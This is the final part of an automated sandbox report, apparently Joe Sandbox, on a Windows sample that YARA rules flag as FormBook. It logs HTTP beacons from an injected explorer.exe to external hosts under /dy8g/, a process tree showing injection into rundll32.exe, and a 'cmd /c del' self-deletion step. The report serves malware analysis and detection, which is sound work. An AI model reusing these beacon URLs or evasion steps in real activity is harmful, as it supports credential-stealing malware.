23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 39 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 34 35 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 34 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 35 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 36 36 38 31 3b 26 23 32 35 31 36 33 3b 26 23 32 35 33 35 31 3b 26 23 32 33 36 30 31 3b 26 23 32 31 38 39 38 3b 26 23 33 30 31 34 30 3b 26 23 32 30 31 30 32 3b 26 23 39 35 3b 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 30 33 32 30 3b 26 23 32 36 31 35 39 3b 26 23 31 39 39 38 31 3b 26 23 32 36 31 35 39 3b 26 23 32 37 34 32 34 3b 26 23 39 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 38 34 30 35 3b 26 23 33 35 38 33 35 3b 26 23 39 35 3b 26 23 32 31 34 34 38 3b 26 23 32 32 39 30 39 3b 26 23 32 39 36 30 39 3b 26 23 32 31 34 34 38 3b 26 23 32 30 38 36 39 3b 26 23 32 33 33 38 34 3b 26 23 32 33 35 36 37 3b 26 23 33 30 33 34 30 3b 26 23 32 33 35 36 37 3b 26 23 34 30 36 34 34 3b 26 23 32 37 38 33 33 3b 26 23 32 38 32 31 36 3b 26 23 32 35 31 30 33 3b 26 23 39 35 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 39 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 34 35 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 34 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34
                                                                                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#23567;&#19996;&#35199;&#25165;&#19968;&#26681;&#25163;&#25351;&#23601;&#21898;&#30140;&#20102;&#95;&#23567;&#19996;&#35199;&#20320;&#26159;&#19981;&#26159;&#27424;&#99;&#20813;&#36153;&#38405;&#35835;&#95;&#21448;&#22909;&#29609;&#21448;&#20869;&#23384;&#23567;&#30340;&#23567;&#40644;&#27833;&#28216;&#25103;&#95;&#25104;&#24180;&#22899;&#20154;&#20813;&#36153;&#35270;&#39057;&#25773;&#25918;&#55;&#55;&#55;&#55;&#95;&#26085;&#26412;&#19981;&#21345;&#19968;&#21345;&#20108;&#21345;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#23567;&#19996;&#35199;&#25165;&#19968;&#26681;&#25163;&#25351;&#23601;&#21898;&#30140;&#20102;&#95;&#23567;&#19996;&#35199;&#20320;&#26159;&#19981;&#26159;&#27424;&#99;&#20813;&#36153;&#38405;&#35835;&#95;&#21448;&#22909;&#29609;&#21448;&#20869;&#23384;&#23567;&#30340;&#23567;&#40644;&#27833;&#28216;&#25103;&#95;&#25104;&#24180;&#22899;&#20154;&#20813;&#36153;&#35270;&#39057;&#25773;&#25918;&#55;&#55;&#55;&#55;&#95;&#26085;&#26412;&#19981;&#21345;&#19968;&#21345;&#20108;&#21345;&#22312;&#3244


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.64976852.79.124.17380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:51.038847923 CEST5649OUTGET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.mzyxi-rkah-y.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:51.324237108 CEST5649INHTTP/1.1 301 Moved Permanently
                                                                                                                        Server: awselb/2.0
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:51 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 134
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.mzyxi-rkah-y.net:443/dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.64977175.2.81.22180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:26:06.599775076 CEST5667OUTGET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1
                                                                                                                        Host: www.thenorthgoldline.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:26:06.760885954 CEST5668INHTTP/1.1 403 Forbidden
                                                                                                                        Date: Tue, 22 Jun 2021 16:26:06 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Server: nginx
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: PQMW0W5h3X.exe PID: 6528 Parent PID: 6056

                                                                                                                        General

                                                                                                                        Start time:18:24:06
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\PQMW0W5h3X.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:205167 bytes
                                                                                                                        MD5 hash:6B26DB585F40E14B00B5ADDA57E595DD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: PQMW0W5h3X.exe PID: 6608 Parent PID: 6528

                                                                                                                        General

                                                                                                                        Start time:18:24:07
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\PQMW0W5h3X.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:205167 bytes
                                                                                                                        MD5 hash:6B26DB585F40E14B00B5ADDA57E595DD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6608

                                                                                                                        General

                                                                                                                        Start time:18:24:11
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff6f22f0000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: rundll32.exe PID: 6820 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:18:24:30
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Imagebase:0x140000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: cmd.exe PID: 7032 Parent PID: 6820

                                                                                                                        General

                                                                                                                        Start time:18:24:33
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
                                                                                                                        Imagebase:0x2a0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: conhost.exe PID: 7040 Parent PID: 7032

                                                                                                                        General

                                                                                                                        Start time:18:24:34
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >